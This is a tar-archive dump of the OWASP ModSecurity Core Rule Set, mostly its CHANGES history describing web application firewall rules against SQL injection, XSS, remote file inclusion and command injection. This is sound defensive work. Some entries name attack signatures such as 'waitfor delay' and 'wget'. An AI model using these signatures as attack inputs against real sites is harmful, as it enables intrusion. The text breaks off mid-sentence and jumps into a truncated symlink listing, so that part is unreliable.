pax_global_header00006660000000000000000000000064121645725640014526gustar00rootroot0000000000000052 comment=0f07cbb9c6ea76bd90169c2f3bed1bc22f75d01d SpiderLabs-owasp-modsecurity-crs-0f07cbb/000077500000000000000000000000001216457256400205245ustar00rootroot00000000000000SpiderLabs-owasp-modsecurity-crs-0f07cbb/.gitignore000066400000000000000000000000141216457256400225070ustar00rootroot00000000000000*.swp *.swo SpiderLabs-owasp-modsecurity-crs-0f07cbb/CHANGES000066400000000000000000001143501216457256400215230ustar00rootroot00000000000000== OWASP ModSecurity Core Rule Set (CRS) CHANGES == == Report Bugs/Issues to GitHub Issues Tracker == * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues == Version 2.2.8 - 06/30/2013 == Security Fixes: Improvements: * Updatd the /util directory structure * Added scripts to check Rule ID duplicates * Added script to remove v2.7 actions so older ModSecurity rules will work - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/43 * Added new PHP rule (958977) to detect PHP exploits (Plesk 0-day from king cope) - http://seclists.org/fulldisclosure/2013/Jun/21 - http://blog.spiderlabs.com/2013/06/honeypot-alert-active-exploits-attempts-for-plesk-vulnerability-.html Bug Fixes: * fix 950901 - word boundary added - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/48 * fix regex error - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/44 * Updated the Regex in 981244 to include word boundaries - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/36 * Problem with Regression Test (Invalid use of backslash) - Rule 960911 - Test2 - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/34 * ModSecurity: No action id present within the rule - ignore_static.conf - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/17 * "Bad robots" rule blocks all Java applets on Windows XP machines - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/16 * duplicated rules id 981173 - 
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/18 == Version 2.2.7 - 12/19/2012 == Security Fixes: Improvements: * Added JS Overrides file to identify successful XSS probes * Added new XSS Detection Rules from Ashar Javed (http://twitter.com/soaj1664ashar) - http://jsfiddle.net/U9RmU/4/ * Updated the SQLi Filters to add in Oracle specific functions - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/7 Bug Fixes: * Fixed Session Hijacking rules - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/8 * Fixed bug in XSS rules checking TX:PM_XSS_SCORE variable == Version 2.2.6 - 09/14/2012 == Security Fixes: Improvements: * Started rule formatting update for better readability * Added maturity and accuracy action data to each rule * Updated rule revision (rev) action * Added rule version (ver) action * Added more regression tests (util/regression_tests/) * Modified Rule ID 960342 to block large file attachments in phase:1 * Removed all PARANOID rule checks * Added new Session Fixation rules Bug Fixes: * Fixed missing ending double-quotes in XSS rules file * Moved SecDefaultAction setting from phase:2 to phase:1 * Fixed Session Hijacking SessionID Regex https://www.modsecurity.org/tracker/browse/CORERULES-79 * Changed the variable listing for many generic attack rules to exclude REQUEST_FILENAME https://www.modsecurity.org/tracker/browse/CORERULES-78 == Version 2.2.5 - 06/14/2012 == Security Fixes: * Updated the anomaly scoring value for rule ID 960000 to critical (Identified by Qualys Vulnerability & Malware Research Labs (VMRL)) (https://community.qualys.com/blogs/securitylabs/2012/06/15/modsecurity-and-modsecurity-core-rule-set-multipart-bypasses) * Updated Content-Type check to fix possible evasion with @within (Identified by Qualys Vulnerability & Malware Research Labs (VMRL)) (https://community.qualys.com/blogs/securitylabs/2012/06/15/modsecurity-and-modsecurity-core-rule-set-multipart-bypasses) Improvements: * Renamed main config file to 
modsecurity_crs_10_setup.conf * Updated the rule IDs to start from CRS reserved range: 900000 * Updated rule formatting for readability * Updated the CSRF rules to use UNIQUE_ID as the token source * Added the zap2modsec.pl script to the /util directory which converts OWASP ZAP Scanner XML data into ModSecurity Virtual Patches * Updated the Directory Traversal Signatures to include more obfuscated data * Added Arachni Scanner Integration Lua script/rules files Bug Fixes: * Added forceRequestBodyVariable action to rule ID 960904 == Version 2.2.4 - 03/14/2012 == Improvements: * Added Location and Set-Cookie checks to Response Splitting rule ID 950910 * Added a README file to the activated_rules directory * Consolidate a number of SQL Injection rules into optimized regexs * Removed multiMatch and replaceComments from SQL Injection rules * Updated the SQLi regexs for greediness * Updated the SQLi setvar anomaly score values to use macro expansion * Removed PARANOID mode rules Bug Fixes: * Fixed missing comma before severity action in rules 958291, 958230 and 958231 * Fixed duplicate rule IDs == Version 2.2.3 - 12/19/2011 == Improvements: * Added Watcher Cookie Checks to optional_rules/modsecurity_crs_55_application_defects.conf file http://websecuritytool.codeplex.com/wikipage?title=Checks#cookies * Added Watcher Charset Checks to optional_rules/modsecurity_crs_55_application_defects.conf file http://websecuritytool.codeplex.com/wikipage?title=Checks#charset * Added Watcher Header Checks to optional_rules/modsecurity_crs_55_application_defects.conf file http://websecuritytool.codeplex.com/wikipage?title=Checks#header Bug Fixes: * Fixed Content-Type evasion issue by adding ctl:forceRequestBodyVariable action to rule ID 960010. (Identified by Andrew Wilson of Trustwave SpiderLabs). * Updated the regex and added tags for RFI rules. 
== Version 2.2.2 - 09/28/2011 == Improvements: * Updated the AppSensor Profiling (to use Lua scripts) for Request Exceptions Detection Points * Added new Range header detection checks to prevent Apache DoS * Added new Security Scanner User-Agent strings * Added example script to the /util directory to convert Arachni DAST scanner XML data into ModSecurity virtual patching rules. * Updated the SQLi Character Anomaly Detection Rules * Added Host header info to the RESOURCE collection key for AppSensor profiling rules Bug Fixes: * Fixed action list for XSS rules (replaced pass,nolog,auditlog with block) * Fixed Request Limit rules by removing & from variables * Fixed Session Hijacking IP/UA hash captures * Updated the SQLi regex for rule ID 981242 == Version 2.2.1 - 07/20/2011 == Improvements: * Extensive SQL Injection signature updates as a result of the SQLi Challenge http://www.modsecurity.org/demo/challenge.html * Updated the SQL Error message detection in response bodies * Updated SQL Injection signatures to include more DB functions * Updated the WEAK SQL Injection signatures * Added tag AppSensor/RE8 to rule ID 960018 Bug Fixes: * Fixed Bad Robot logic for rule ID 990012 to further qualify User-Agent matches https://www.modsecurity.org/tracker/browse/CORERULES-70 * Fixed Session Hijacking rules to properly capture IP address network hashes. * Added the multiMatch action to the SQLi rules * Fixed a false negative logic flaw within the advanced_filter_converter.lua script * Fixed missing : in id action in DoS ruleset. * Updated rule ID 971150 signature to remove ; == Version 2.2.0 - 05/26/2011 == Improvements: * Changed Licensing from GPLv2 to Apache Software License v2 (ASLv2) http://www.apache.org/licenses/LICENSE-2.0.txt * Created new INSTALL file outlining quick config setup * Added a new rule regression testing framework to the /util directory * Added new activated_rules directory which will allow users to place symlinks pointing to files they want to run. 
This allows for easier Apache Include wild-carding * Adding in new RULE_MATURITY and RULE_ACCURACY tags * Adding in a check for X-Forwarded-For source IP when creating IP collection * Added new Application Defect checks (55 app defect file) from Watcher tool (Check Charset) http://websecuritytool.codeplex.com/wikipage?title=Checks#charset * Added new AppSensor rules to experimental_dir https://www.owasp.org/index.php/AppSensor_DetectionPoints * Added new Generic Malicious JS checks in outbound content * Added experimental IP Forensic rules to gather Client hostname/whois info http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html * Added support for Mozilla's Content Security Policy (CSP) to the experimental_rules http://blog.spiderlabs.com/2011/04/modsecurity-advanced-topic-of-the-week-integrating-content-security-policy-csp.html * Global collection in the 10 file now uses the Host Request Header as the collection key. This allows for per-site global collections. * Added new SpiderLabs Research (SLR) rules directory (slr_rules) for known vulnerabilities. This includes both converted web rules from Emerging Threats (ET) and from SLR Team. 
* Added new SLR rule packs for known application vulns for WordPress, Joomla and phpBB * Added experimental rules for detecting Open Proxy Abuse http://blog.spiderlabs.com/2011/03/detecting-malice-with-modsecurity-open-proxy-abuse.html * Added experimental Passive Vulnerability Scanning ruleset using OSVDB and Lua API http://blog.spiderlabs.com/2011/02/modsecurity-advanced-topic-of-the-week-passive-vulnerability-scanning-part-1-osvdb-checks.html * Added additional URI Request Validation rule to the 20 protocol violations file (Rule ID - 981227) * Added new SQLi detection rules (959070, 959071 and 959072) * Added "Toata dragostea mea pentru diavola" to the malicious User-Agent data https://www.modsecurity.org/tracker/browse/CORERULES-64 Bug Fixes: * Assigned IDs to all active SecRules/SecActions * Removed rule inversion (!) from rule ID 960902 * Fixed false negative issue in Response Splitting Rule * Fixed false negative issue with @validateByteRange check * Updated the TARGETS listing for rule ID 950908 * Updated TX data for REQBODY processing * Changed the pass action to block in the RFI rules in the 40 generic file * Updated RFI regex to catch IP address usage in hostname https://www.modsecurity.org/tracker/browse/CORERULES-68 * Changed REQUEST_URI_RAW variable to REQUEST_LINE in SLR rules to allow matches on request methods. * Updated the RFI rules in the 40 generic attacks conf file to remove explicit logging actions. They will now inherit the settings from the SecDefaultAction == Version 2.1.2 - 02/17/2011 == Improvements: * Added experimental real-time application profiling ruleset. * Added experimental Lua script for profiling the # of page scripts, iframes, etc.. which will help to identify successful XSS attacks and planting of malware links. * Added new CSRF detection rule which will trigger if a subsequent request comes too quickly (need to use the Ignore Static Content rules). 
Bug Fixes: * Added missing " in the skipAfter SecAction in the CC Detection rule set == Version 2.1.1 - 12/30/2010 == Bug Fixes: * Updated the 10 config conf file to add in pass action to User-Agent rule * Updated the CSRF ruleset to conditionally do content injection - if the csrf token was created by the session hijacking conf file * Updated the session hijacking conf file to only enforce rules if a SessionID Cookie was submitted * Fixed macro expansion setvar bug in the restricted file extension rule * Moved the comment spam data file into the optional_rules directory == Version 2.1.0 - 12/29/2010 == Improvements: * Added Experimental Lua Converter script to normalize payloads. Based on PHPIDS Converter code and it is used with the advanced filters conf file. * Changed the name of PHPIDS converted rules to Advanced Filters * Added Ignore Static Content (Performance enhancement) rule set * Added XML Enabler (Web Services) rule set which will parse XML data * Added Authorized Vulnerability Scanning (AVS) Whitelist rule set * Added Denial of Service (DoS) Protection rule set * Added Slow HTTP DoS (Connection Consumption) Protection rule set * Added Brute Force Attack Protection rule set * Added Session Hijacking Detection rule set * Added Username Tracking rule set * Added Authentication Tracking rule set * Added Anti-Virus Scanning of File Attachments rule set * Added AV Scanning program to /util directory * Added Credit Card Usage Tracking/Leakage Prevention rule set * Added experimental CC Track/PAN Leakage Prevention rule set * Added an experimental_rules directory to hold new BETA rules * Moved the local exceptions conf file back into base_rules directory however it has a ".example" extension to prevent overwriting customized versions when upgrading * Separated out HTTP Parameter Pollution and Restricted Character Anomaly Detection rules to the experimental_rules directory * Adding the REQUEST_HEADERS:User-Agent macro data to the initcol in 10 config file, which 
will help to make collections a bit more unique == Version 2.0.10 - 11/29/2010 == Improvements: * Commented out the Anomaly Scoring Blocking Mode TX variable since, by default, the CRS is running in traditional mode. Bug Fixes: * Moved all skipAfter actions in chained rules to chain starter SecRules https://www.modsecurity.org/tracker/browse/MODSEC-159 * Changed phases on several rules in the 20 protocol anomaly rules file to phase:1 to avoid FNs == Version 2.0.9 - 11/17/2010 == Improvements: * Changed the name of the main config file to modsecurity_crs_10_config.conf.example so that it will not overwrite existing config settings. Users should rename this file to activate it. * Traditional detection mode is now the current default * Users can now more easily toggle between traditional/standard mode vs. anomaly scoring mode by editing the modsecurity_crs_10_config.conf file * Updated the disruptive actions in most rules to use "block" action instead of "pass". This is to allow for the toggling between traditional vs. anomaly scoring modes. * Removed logging actions from most rules so that it can be controlled from the SecDefaultAction setting in the modsecurity_crs_10_config.conf file * Updated the anomaly scores in the modsecurity_crs_10_config.conf file to more closely match what is used in the PHPIDS rules. These still have the same factor of severity even though the numbers themselves are smaller. * Updated the 49 and 59 blocking rules to include the matched logdata * Updated the TAG data to further classify attack/vuln categories. 
* Updated the SQL Injection filters to detect more boolean logic attacks * Moved some files to optional_rules directory (phpids, Emerging Threats rules) Bug Fixes: * Fixed Rule ID 960023 in optional_rules/modsecurity_crs_40_experimental.conf is missing 1 single quote https://www.modsecurity.org/tracker/browse/CORERULES-63 * Moved all skipAfter actions in chained rules to the rule starter line (must have ModSec v2.5.13 or higher) https://www.modsecurity.org/tracker/browse/MODSEC-159 * Fixed restricted file extension bug with macro expansion https://www.modsecurity.org/tracker/browse/CORERULES-60 * Updated the SQLI TX variable macro expansion data in the 49 and 60 files so that it matches what is being set in the sql injection conf file * Fixed typo in SQL Injection regexs - missing backslash for word boundary (b) https://www.modsecurity.org/tracker/browse/CORERULES-62 == Version 2.0.8 - 08/27/2010 == Improvements: * Updated the PHPIDS filters * Updated the SQL Injection filters to detect boolean attacks (1<2, foo == bar, etc..) 
* Updated the SQL Injection filters to account for different quotes * Added UTF-8 encoding validation support to the modsecurity_crs_10_config.conf file * Added Rule ID 950109 to detect multiple URL encodings * Added two experimental rules to detect anomalous use of special characters Bug Fixes: * Fixed Encoding Detection RegEx (950107 and 950108) * Fixed rules-updater.pl script to better handle whitespace https://www.modsecurity.org/tracker/browse/MODSEC-167 * Fixed missing pass action bug in modsecurity_crs_21_protocol_anomalies.conf https://www.modsecurity.org/tracker/browse/CORERULES-55 * Fixed the anomaly scoring in the modsecurity_crs_41_phpids_filters.conf file https://www.modsecurity.org/tracker/browse/CORERULES-54 * Updated XSS rule id 958001 to improve the .cookie regex to reduce false positives https://www.modsecurity.org/tracker/browse/CORERULES-29 == Version 2.0.7 - 06/4/2010 == Improvements: * Added CSRF Protection Ruleset which will use Content Injection to add javascript to specific outbound data and then validate the csrf token on subsequent requests. * Added new Application Defect Ruleset which will identify/fix missing HTTPOnly cookie flags * Added Experimental XSS/Missing Output Escaping Ruleset which looks for user supplied data being echoed back to user unchanged. * Added rules-updater.pl script and configuration file to allow users to automatically download CRS rules from the CRS rules repository. * Added new SQLi keyword for ciel() and reverse() functions. * Updated the PHPIDS filters Bug Fixes: * Fixed false positives for Request Header Name matching in the 30 file by adding boundary characters. 
* Added missing pass actions to @pmFromFile prequalifier rules * Added backslash to SQLi regex https://www.modsecurity.org/tracker/browse/CORERULES-41 * Fixed hard coded anomaly score in PHPIDS filter file https://www.modsecurity.org/tracker/browse/CORERULES-45 * Fixed restricted_extension false positive by adding boundary characters == Version 2.0.6 - 02/26/2010 == Bug Fixes: * Added missing transformation functions to SQLi rules. https://www.modsecurity.org/tracker/browse/CORERULES-32 * Fixed duplicate rule IDs. https://www.modsecurity.org/tracker/browse/CORERULES-33 * Fixed typo in @pmFromFile in the Comment SPAM rules https://www.modsecurity.org/tracker/browse/CORERULES-34 * Added macro expansion to Restricted Headers rule https://www.modsecurity.org/tracker/browse/CORERULES-35 * Fixed misspelled SecMarker https://www.modsecurity.org/tracker/browse/CORERULES-36 * Fixed missing chain action in Content-Type header check https://www.modsecurity.org/tracker/browse/CORERULES-37 * Update phpids filters to use pass action instead of block == Version 2.0.5 - 02/01/2010 == Improvements: * Removed previous 10 config files as they may conflict with local customized Mod configs. * Added a new 10 config file that allows the user to globally set TX variables to turn on/off PARANOID_MODE inspection, set anomaly score levels and http policies. Must have ModSecurity 2.5.12 to use the macro expansion in numeric operators. * Added Rule Logic and Reference links to rules descriptions. * Added Rule IDs to all rules. * Added tag data mapping to new OWASP Top 10 and AppSensor Projects, WASC Threat Classification * Removed Apache limit directives from the 23 file * Added macro expansion to 23 file checks. 
* Added @pmFromFile check to 35 bad robots file * Added malicious UA strings to 35 bad robots check * Created an experimental rules file * Updated HTTP Parameter Pollution (HPP) rule logic to concat data into a TX variable for inspection * Removed TX inspections for generic attacks and reverted to standard ARGS inspection https://www.modsecurity.org/tracker/browse/MODSEC-120 * Updated the variable list for standard inspections (ARGS|ARGS_NAMES|XML:/*) and moved the other variables to the PARANOID list (REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS|TX:HPP_DATA) * Moved converted ET Snort rules to the /optional_rules directory * Created a new Header Tagging ruleset (optional_rules) that will add matched rule data to the request headers. * Updated Inbound blocking conf file to use macro expansion from the 10 config file settings * Added separate anomaly scores for inbound, outbound and total to be evaluated for blocking. * Updated the regex logic in the (1=1) rule to factor in quotes and other logical operators. * Updated the SPAMMER RBL check rules logic to only check once per IP/Day. * Added new outbound malware link detection rules. * Added PHP "call_user_func" to blacklist Identified by SOGETI ESEC R&D Bug Fixes: * Removed Non-numeric Rule IDs https://www.modsecurity.org/tracker/browse/CORERULES-28 * Updated the variable list on SQLi rules. * Fixed outbound @pmFromFile action from allow to skipAfter to allow for outbound anomaly scoring and blocking == Version 2.0.4 - 11/30/2009 == Improvements: * Updated converted PHPIDS signatures (https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml) * Updated PHPIDS rules logic to first search for payloads in ARGS and then if there is no match found then search more generically in request_body|request_uri_raw * Updated PHPIDS rules logic to only set TX variables and to not log. This allows for more clean exceptions in the 48 file which can then expire/delete false positive TX matches and adjust the anomaly scores. 
These rules will then inspect for any TX variables in phase:5 and create appropriate alerts for any variable matches that exist. Bug Fixes: * Added Anomaly Score check to the 60 correlation file to recheck the anomaly score at the end of phase:4 which would allow for blocking based on information leakage issues. == Version 2.0.3 - 11/05/2009 == Improvements: * Updated converted PHPIDS signatures (https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml) * Create a new PHPIDS Converter rules file (https://svn.php-ids.org/svn/trunk/lib/IDS/Converter.php) * Added new rules to identify multipart/form-data bypass attempts * Increased anomaly scoring (+100) for REQBODY_PROCESSOR_ERROR alerts Bug Fixes: * Added t:urlDecodeUni transformation function to phpids rules to fix both false positives/negatives https://www.modsecurity.org/tracker/browse/CORERULES-17 * Added new variable locations to the phpids filters https://www.modsecurity.org/tracker/browse/CORERULES-19 * Use of transformation functions can cause false negatives - added multiMatch action to phpids rules https://www.modsecurity.org/tracker/browse/CORERULES-20 * Fixed multipart parsing evasion issues by adding strict parsing rules https://www.modsecurity.org/tracker/browse/CORERULES-21 * Fixed typo in xss rules (missing |) https://www.modsecurity.org/tracker/browse/CORERULES-22 * Fixed regex text in IE8 XSS filters (changed to lowercase) https://www.modsecurity.org/tracker/browse/CORERULES-23 == Version 2.0.2 - 09/11/2009 == Improvements: * Added converted PHPIDS signatures (https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml) https://www.modsecurity.org/tracker/browse/CORERULES-13 Bug Fixes: * Rule 958297 - Fixed Comment SPAM UA false positive that triggered only on mozilla. 
https://www.modsecurity.org/tracker/browse/CORERULES-15 == Version 2.0.1 - 08/07/2009 == Improvements: * Updated the transformation functions used in the XSS/SQLi rules to improve performance https://www.modsecurity.org/tracker/browse/CORERULES-10 * Updated the variable/target list in the XSS rules https://www.modsecurity.org/tracker/browse/CORERULES-11 * Added XSS Filters from IE8 https://www.modsecurity.org/tracker/browse/CORERULES-12 Bug Fixes: * Rule 958297 - Fixed unescaped double-quote issue in Comment SPAM UA rule. https://www.modsecurity.org/tracker/browse/CORERULES-9 == Version 2.0.0 - 07/29/2009 == New Rules & Features: * Fine Grained Policy The rules have been split to having one signature per rule instead of having all signatures combined into one optimized regular expression. This should allow you to modify/disable events based on specific patterns instead of having to deal with the whole rule. * Converted Snort Rules Emerging Threat web attack rules have been converted. http://www.emergingthreats.net/ * Anomaly Scoring Mode Option The rules have been updated to include anomaly scoring variables which allow you to evaluate the score at the end of phase:2 and phase:5 and decide on what logging and disruptive actions to take based on the score. * Correlated Events There are rules in phase:5 that will provide some correlation between inbound events and outbound events and will provide a result of successful attack or attempted attack. * Updated Severity Ratings The severity ratings in the rules have been updated to the following: - 0: Emergency - is generated from correlation where there is an inbound attack and an outbound leakage. - 1: Alert - is generated from correlation where there is an inbound attack and an outbound application level error. - 2: Critical - is the highest severity level possible without correlation. It is normally generated by the web attack rules (40 level files). 
- 3: Error - is generated mostly from outbound leakage rules (50 level files). - 4: Warning - is generated by malicious client rules (35 level files). - 5: Notice - is generated by the Protocol policy and anomaly files. - 6: Info - is generated by the search engine clients (55 marketing file). * Updated Comment SPAM Protections Updated rules to include RBL lookups and client fingerprinting concepts from Bad Behavior (www.bad-behavior.ioerror.us) * Creation of Global Collection Automatically create a Global collection in the *10* config file. Other rules can then access it. * Use of Block Action Updated the rules to use the "block" action. This allows the Admin to globally set the desired block action once with SecDefaultAction in the *10* config file rather than having to edit the disruptive actions in all of the rules or for the need to have multiple versions of the rules (blocking vs. non-blocking). * "Possible HTTP Parameter Pollution Attack: Multiple Parameters with the same Name." http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html * Added new generic RFI detection rules. http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html * "Possibly malicious iframe tag in output" (Rules 981001,981002) Planting invisible iframes in a site can be used by attackers to point users from the victim site to their malicious site. This is actually as if the user was visiting the attacker's site himself, causing the user's browser to process the content in the attacker's site. New Events: * Rule 960019 - Expect Header Not Allowed. * Rule 960020 - Pragma Header Requires Cache-Control Header * Rule 958290 - Invalid Character in Request - Browsers should not send the (#) character as it is reserved for use as a fragment identifier within the html page. * Rule 958291 - Range: field exists and begins with 0. * Rule 958292 - Invalid Request Header Found. * Rule 958293 - Lowercase Via Request Header Found. 
* Rule 958294 - Common SPAM Proxies found in Via Request Header. * Rule 958295 - Multiple/Conflicting Connection Header Data Found. * Rule 958296 - Request Indicates a SPAM client accessed the Site. * Rule 958297 - Common SPAM/Email Harvester crawler. * Rule 958298 - Common SPAM/Email Harvester crawler Bug Fixes: * Rule 950107 - Split the rule into 2 separate rules to factor in the Content-Type when inspecting the REQUEST_BODY variable. * Rule 960017 - Bug fix for when having port in the host header. * Rule 960014 - Bug fix to correlate the SERVER_NAME variable. * Rule 950801 - Increased the logic so that the rule will only run if the web site uses UTF-8 Encoding. * Rules 999210,999211 - Bug fix to move ctl actions to last rule, add OPTIONS and allow the IPv6 loopback address * Rule 950117 - Updated the RFI logic to factor in both a trailing "?" in the ARG and to identify offsite hosts by comparing the ARG URI to the Host header. Due to this rule now being stronger, moved it from optional tight security rule to *40* generic attacks file. Other Fixes: * Added more HTTP Protocol violations to *20* file. * Set the SecDefaultAction in the *10* config file to log/pass (This was the default setting, however this sets it explicitly.) * Added SecResponseBodyLimitAction ProcessPartial to the *10* config file. This was added so that when running the SecRuleEngine in DetectionOnly mode, it will not deny response bodies that go over the size restrictions. * Changed SecServerSignature to "Apache/1.3.28" * Fixed the use of SkipAfter and SecMarkers to make it consistent. Now have BEGIN and END SecMarkers for rule groups to more accurately allow moving to proper locations. * Fixed the @pm/@pmFromFile pre-qualifier logic to allow for operator inversion. This removes the need for some SecAction/SkipAfter rules. * Updated rule formatting to easily show rule containers (SecMarkers, pre-qualifier rules and chained rules). 
== Version 1.6.1 - 2008/04/22 == * Fixed a bug where phases and transformations were not specified explicitly in rules. The issue affected a significant number of rules, and we strongly recommend to upgrade. == Version 1.6.0 - 2008/02/19 == New Rulesets & Features: * 42 - Tight Security This ruleset contains currently 2 rules which are considered highly prone to FPs. They take care of Path Traversal attacks, and RFI attacks. This ruleset is included in the optional_rulesets dir * 42 - Comment Spam Comment Spam is used by the spammers to increase their rating in search engines by posting links to their site in other sites that allow posting of comments and messages. The rules in this ruleset will work against that. (Requires ModSecurity 2.5) * Tags A single type of attack is often detected by multiple rules. The new alert classification tags solve this issue by providing an alternative alert type indication and can serve for filtering and analysis of audit logs. The classification tags are hierarchical with slashes separating levels. Usually there are two levels with the top level describing the alert group and the lower level denoting the alert type itself, for example: WEB_ATTACK/SQL_INJECTION. False Positives Fixes: * Rule 960903 - Moved to phase 4 instead of 5 to avoid FPs * Rule 950107 - Will look for invalid url decoding in variables that are not automatically url decoded Additional rules logic: * Using the new "logdata" action for logging the matched signature in rules * When logging an event once, init the collection only if the alert needs to log * Using the new operator @pm as a qualifier before large rules to enhance performance (Requires ModSecurity 2.5) * SQL injection - A smarter regexp is used to detect 1=1,2=2,etc.. and not only 1=1. 
(Thanks to Marc Stern for the idea) * New XSS signatures - iframe & flash XSS == Version 1.5.1 - 2007/12/6 == False Positives Fixes: * Protocol Anomalies (file 21) - exception for Apache SSL pinger (Request: GET /) New Events: * 960019 - Detect HTTP/0.9 Requests HTTP/0.9 requests are not common these days. This rule will log by default, and block in the blocking version of file 21 Other Fixes: * File 40, Rules 950004,950005 - Repaired the correction for the double url decoding problem * File 55 contained empty regular expressions. Fixed. == Version 1.5 - 2007/11/23 == New Rulesets: * 23 - Request Limits "Judging by appearances". This ruleset contains rules blocking based on the size of the request, for example, a request with too many arguments will be denied. Default policy changes: * XML protection off by default * BLOCKING dir renamed to optional_rules * Ruleset 55 (marketing) is now optional (added to the optional_rules dir) * Ruleset 21 - The exception for apache internal monitor will not log anymore New Events: * 960912 - Invalid request body Malformed content will not be parsed by modsecurity, but still there might be applications that will parse it, ignoring the errors. * 960913 - Invalid Request Will trigger a security event when request was rejected by apache with code 400, without going through ModSecurity rules. Additional rules logic: * 950001 - New signature: delete from * 950007 - New signature: waitfor delay False Positives Fixes: * 950006 - Will not be looking for /cc pattern in User-Agent header * 950002 - "Internet Explorer" signature removed * Double decoding bug used to cause FPs. Some of the parameters are already url-decoded by apache. This caused FPs when the rule performed another url-decoding transformation. The rules have been split so that parameters already decoded by apache will not be decoded by the rules anymore. * 960911 - Expression is much more permissive now * 950801 - Commented out entirely. 
NOTE: If your system uses UTF8 encoding, then you should uncomment this rule (in file 20) version 1.4.3 - 2007/07/21 New Events: * 950012 - HTTP Request Smuggling For more info on this attack: http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf * 960912 - Invalid request body Malformed content will not be parsed by modsecurity, but still there might be applications that will parse it, ignoring the errors. * 960913 - Invalid Request Will trigger a security event when a request was rejected by apache with code 400, without going through ModSecurity rules. False Positives Fixes: * 950107 - Will allow a % sign in the middle of a string as well * 960911 - A more accurate expression based on the rfc: http://www.ietf.org/rfc/rfc2396.txt * 950015 - Will not look for http/ pattern in the request headers Additional rules logic: * Since Apache applies scope directives only after ModSecurity phase 1, these directives cannot be used to exclude phase 1 rules. Therefore we moved all inspection rules to phase 2. version 1.4 build 2 - 2007/05/17 New Feature: * Search for signatures in XML content XML Content will be parsed and inspected for signatures New Events: * 950116 - Unicode Full/Half Width Abuse Attack Attempt Full-width unicode can be used to bypass content inspection. Such encoding will be forbidden http://www.kb.cert.org/vuls/id/739224 * 960911 - Invalid HTTP request line Enforce request line to be valid, i.e.: * 960904 - Request Missing Content-Type (when there is content) When a request contains content, the content-type must be specified. 
If not, the content will not be inspected * 970018 - IIS installed in default location (any drive) Log once if IIS is installed in the /Inetpub directory (on any drive, not only C) * 950019 - Email Injection Web forms used for sending mail (such as "tell a friend") are often manipulated by spammers for sending anonymous emails Regular expressions fixes: * Further optimization of some regular expressions (using the non-greediness operator) The non-greediness operator, ?, prevents excessive backtracking FP fixes: * Rule 950107 - Will allow a parameter to end in a % sign from now on version 1.4 - 2007/05/02 New Events: * 970021 - WebLogic information disclosure Matching of "JSP compile error" in the response body, will trigger this rule, with severity 4 (Warning) * 950015,950910,950911 - HTTP Response Splitting Looking for HTTP Response Splitting patterns as described in Amit Klein's excellent white paper: http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf ModSecurity does not support compressed content at the moment. Thus, the following rules have been added: * 960902 - Content-Encoding in request not supported Any incoming compressed request will be denied * 960903 - Content-Encoding in response not supported An outgoing compressed response will be logged to alert, but ONLY ONCE. False Positives Fixes: * Removed <.exe>,<.shtml> from restricted extensions * Will not be looking for SQL Injection signatures , in the Via request header * Excluded Referer header from SQL injection, XSS and command injection rules * Excluded X-OS-Prefs header from command injection rule * Will be looking for command injection signatures in REQUEST_COOKIES|REQUEST_COOKIES_NAMES instead of REQUEST_HEADERS:Cookie. 
* Allowing charset specification in the Content-Type Additional rules logic: * Corrected match of OPTIONS method in event 960015 * Changed location for event 960014 (proxy access) to REQUEST_URI_RAW * Moved all rules apart from method inspection from phase 1 to phase 2 - This will enable viewing content if such a rule triggers as well as setting exceptions using Apache scope tags. * Added match for double quote in addition to single quote for signature (SQL Injection) * Added 1=1 signature (SQL Injection) version 1.3.2 build 4 2007/01/17 Fixed apache 2.4 dummy requests exclusion Added persistent PDF UXSS detection rule == Version 1.3.2 build 3 2007/01/10 == Fixed regular expression in rule 960010 (file #30) to allow multipart form data content == Version 1.3.2 - 2006/12/27 == New events: * 960037 Directory is restricted by policy * 960038 HTTP header is restricted by policy Regular expressions fixes: * Regular expressions with @ at end of beginning (for example "@import) * Regular expressions with un-escaped "." * Command Injections now always require certain characters both before and after the command. Important since many are common English words (finger, mail) * The command injection wget is not searched in the UA header as it has a different meaning there. * LDAP Fixed to reduce FPs: + More accurate regular expressions + high bit characters not accepted between signature tokens. 
* Do not detect /usr/local/apache/conf/crs/base_rules/GsbMalware.dat lrwxr-xr-x 1 root wheel 68 May 17 14:01 modsecurity_35_bad_robots.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_35_bad_robots.data lrwxr-xr-x 1 root wheel 66 May 17 14:01 modsecurity_35_scanners.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_35_scanners.data lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_40_generic_attacks.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_40_generic_attacks.data lrwxr-xr-x 1 root wheel 79 May 17 14:01 modsecurity_41_sql_injection_attacks.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_41_sql_injection_attacks.data lrwxr-xr-x 1 root wheel 74 May 17 14:14 modsecurity_42_comment_spam.data -> /usr/local/apache/conf/crs/optional_rules/modsecurity_42_comment_spam.data lrwxr-xr-x 1 root wheel 66 May 17 14:01 modsecurity_50_outbound.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_50_outbound.data lrwxr-xr-x 1 root wheel 74 May 17 14:01 modsecurity_50_outbound_malware.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_50_outbound_malware.data lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_14_customrules.conf -> 